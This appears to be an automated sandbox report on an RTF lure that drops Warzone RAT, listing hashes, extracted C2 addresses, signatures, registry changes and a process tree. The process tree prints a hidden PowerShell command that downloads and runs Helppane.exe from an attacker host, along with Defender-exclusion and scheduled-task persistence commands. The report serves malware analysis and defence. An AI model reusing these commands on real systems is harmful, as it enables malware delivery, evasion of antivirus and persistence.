Analysis
-
max time kernel
146s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
22/09/2022, 09:16
Static task
static1
Behavioral task
behavioral1
Sample
New contract - Amoje.rtf
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
New contract - Amoje.rtf
Resource
win10v2004-20220812-en
General
-
Target
New contract - Amoje.rtf
-
Size
216KB
-
MD5
6caa64e76f4c59ea0f92960bd0514838
-
SHA1
e091d91c2ab5685265c480edc392b2e892e4d33e
-
SHA256
6f15070d9d3c0bc0257da93111a27cf21d0e2fcc50f19fc76f255dafca520773
-
SHA512
bd1cac8931e1159cb131a6cc1b34baf56eaafe46e6a740bc16b5f653a11fa360e399ea3476c78967a405c9fb8e934a5b6788024d547d0d11b515da78d925e9f4
-
SSDEEP
1536:9i7ENH5B8eHZbv7bpKsYoItS3xPWpjz+EEFZVzFz76mAg5eeVhMDw5wfLz:9LtRVzFtr5RDAw5wfP
Malware Config
Extracted
http://185.230.162.87/news/Helppane.exe
Extracted
warzonerat
20.126.95.155:7800
Signatures
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1328 1204 powershell.exe 22 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1188 1204 cmd.exe 22 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1888 1204 powershell.exe 22 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 440 1204 cmd.exe 22 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1488 1204 powershell.exe 22 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1560 1204 cmd.exe 22 -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT payload 14 IoCs
resource yara_rule behavioral1/memory/1864-118-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-119-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-121-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-122-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-123-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-124-0x0000000000405CE2-mapping.dmp warzonerat behavioral1/memory/1864-128-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1864-129-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1588-146-0x0000000000405CE2-mapping.dmp warzonerat behavioral1/memory/1588-153-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1404-172-0x0000000000405CE2-mapping.dmp warzonerat behavioral1/memory/1404-180-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1588-181-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1404-182-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1328 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
pid Process 1552 Helppane.exe 1512 Helppane.exe 1556 Helppane.exe 304 Helppane.exe 1864 Helppane.exe 1588 Helppane.exe 1656 Helppane.exe 1404 Helppane.exe -
Loads dropped DLL 4 IoCs
pid Process 1188 cmd.exe 1188 cmd.exe 440 cmd.exe 1560 cmd.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1552 set thread context of 1864 1552 Helppane.exe 52 PID 1512 set thread context of 1588 1512 Helppane.exe 57 PID 1556 set thread context of 1404 1556 Helppane.exe 63 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1740 schtasks.exe 944 schtasks.exe 1720 schtasks.exe -
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1204 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1328 powershell.exe 1888 powershell.exe 1488 powershell.exe 1356 powershell.exe 1552 Helppane.exe 1552 Helppane.exe 1652 powershell.exe 1556 Helppane.exe 1556 Helppane.exe 864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 1552 Helppane.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 1556 Helppane.exe Token: SeDebugPrivilege 864 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1204 WINWORD.EXE 1204 WINWORD.EXE 1204 WINWORD.EXE 1204 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1204 wrote to memory of 1328 1204 WINWORD.EXE 29 PID 1204 wrote to memory of 1328 1204 WINWORD.EXE 29 PID 1204 wrote to memory of 1328 1204 WINWORD.EXE 29 PID 1204 wrote to memory of 1328 1204 WINWORD.EXE 29 PID 1204 wrote to memory of 1188 1204 WINWORD.EXE 31 PID 1204 wrote to memory of 1188 1204 WINWORD.EXE 31 PID 1204 wrote to memory of 1188 1204 WINWORD.EXE 31 PID 1204 wrote to memory of 1188 1204 WINWORD.EXE 31 PID 1188 wrote to memory of 1552 1188 cmd.exe 33 PID 1188 wrote to memory of 1552 1188 cmd.exe 33 PID 1188 wrote to memory of 1552 1188 cmd.exe 33 PID 1188 wrote to memory of 1552 1188 cmd.exe 33 PID 1204 wrote to memory of 1888 1204 WINWORD.EXE 34 PID 1204 wrote to memory of 1888 1204 WINWORD.EXE 34 PID 1204 wrote to memory of 1888 1204 WINWORD.EXE 34 PID 1204 wrote to memory of 1888 1204 WINWORD.EXE 34 PID 1204 wrote to memory of 440 1204 WINWORD.EXE 36 PID 1204 wrote to memory of 440 1204 WINWORD.EXE 36 PID 1204 wrote to memory of 440 1204 WINWORD.EXE 36 PID 1204 wrote to memory of 440 1204 WINWORD.EXE 36 PID 440 wrote to memory of 1512 440 cmd.exe 39 PID 440 wrote to memory of 1512 440 cmd.exe 39 PID 440 wrote to memory of 1512 440 cmd.exe 39 PID 440 wrote to memory of 1512 440 cmd.exe 39 PID 1204 wrote to memory of 1488 1204 WINWORD.EXE 38 PID 1204 wrote to memory of 1488 1204 WINWORD.EXE 38 PID 1204 wrote to memory of 1488 1204 WINWORD.EXE 38 PID 1204 wrote to memory of 1488 1204 WINWORD.EXE 38 PID 1204 wrote to memory of 1560 1204 WINWORD.EXE 41 PID 1204 wrote to memory of 1560 1204 WINWORD.EXE 41 PID 1204 wrote to memory of 1560 1204 WINWORD.EXE 41 PID 1204 wrote to memory of 1560 1204 WINWORD.EXE 41 PID 1560 wrote to memory of 1556 1560 cmd.exe 43 PID 1560 wrote to memory of 1556 1560 cmd.exe 43 PID 1560 wrote to memory of 1556 1560 cmd.exe 43 PID 1560 wrote to memory of 1556 1560 cmd.exe 43 PID 1204 wrote to memory of 1584 1204 WINWORD.EXE 46 PID 1204 wrote to memory of 1584 1204 WINWORD.EXE 46 PID 1204 wrote to memory of 1584 1204 WINWORD.EXE 46 PID 1204 wrote to memory of 1584 1204 WINWORD.EXE 46 PID 1552 wrote to memory of 1356 1552 Helppane.exe 47 PID 1552 wrote to memory of 1356 1552 Helppane.exe 47 PID 1552 wrote to memory of 1356 1552 Helppane.exe 47 PID 1552 wrote to memory of 1356 1552 Helppane.exe 47 PID 1552 wrote to memory of 1740 1552 Helppane.exe 49 PID 1552 wrote to memory of 1740 1552 Helppane.exe 49 PID 1552 wrote to memory of 1740 1552 Helppane.exe 49 PID 1552 wrote to memory of 1740 1552 Helppane.exe 49 PID 1552 wrote to memory of 304 1552 Helppane.exe 51 PID 1552 wrote to memory of 304 1552 Helppane.exe 51 PID 1552 wrote to memory of 304 1552 Helppane.exe 51 PID 1552 wrote to memory of 304 1552 Helppane.exe 51 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52 PID 1552 wrote to memory of 1864 1552 Helppane.exe 52
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New contract - Amoje.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.162.87/news/Helppane.exe','C:\Users\Admin\AppData\Roaming\Helppane.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\Helppane.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Roaming\Helppane.exeC:\Users\Admin\AppData\Roaming\Helppane.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nygrvVIyUpqPTi.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nygrvVIyUpqPTi" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1508.tmp"4⤵
- Creates scheduled task(s)
PID:1740
-
-
C:\Users\Admin\AppData\Roaming\Helppane.exe"C:\Users\Admin\AppData\Roaming\Helppane.exe"4⤵
- Executes dropped EXE
PID:304
-
-
C:\Users\Admin\AppData\Roaming\Helppane.exe"C:\Users\Admin\AppData\Roaming\Helppane.exe"4⤵
- Executes dropped EXE
PID:1864
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.162.87/news/Helppane.exe','C:\Users\Admin\AppData\Roaming\Helppane.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\Helppane.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Users\Admin\AppData\Roaming\Helppane.exeC:\Users\Admin\AppData\Roaming\Helppane.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nygrvVIyUpqPTi.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nygrvVIyUpqPTi" /XML "C:\Users\Admin\AppData\Local\Temp\tmp28E5.tmp"4⤵
- Creates scheduled task(s)
PID:944
-
-
C:\Users\Admin\AppData\Roaming\Helppane.exe"C:\Users\Admin\AppData\Roaming\Helppane.exe"4⤵
- Executes dropped EXE
PID:1588
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.162.87/news/Helppane.exe','C:\Users\Admin\AppData\Roaming\Helppane.exe')2⤵
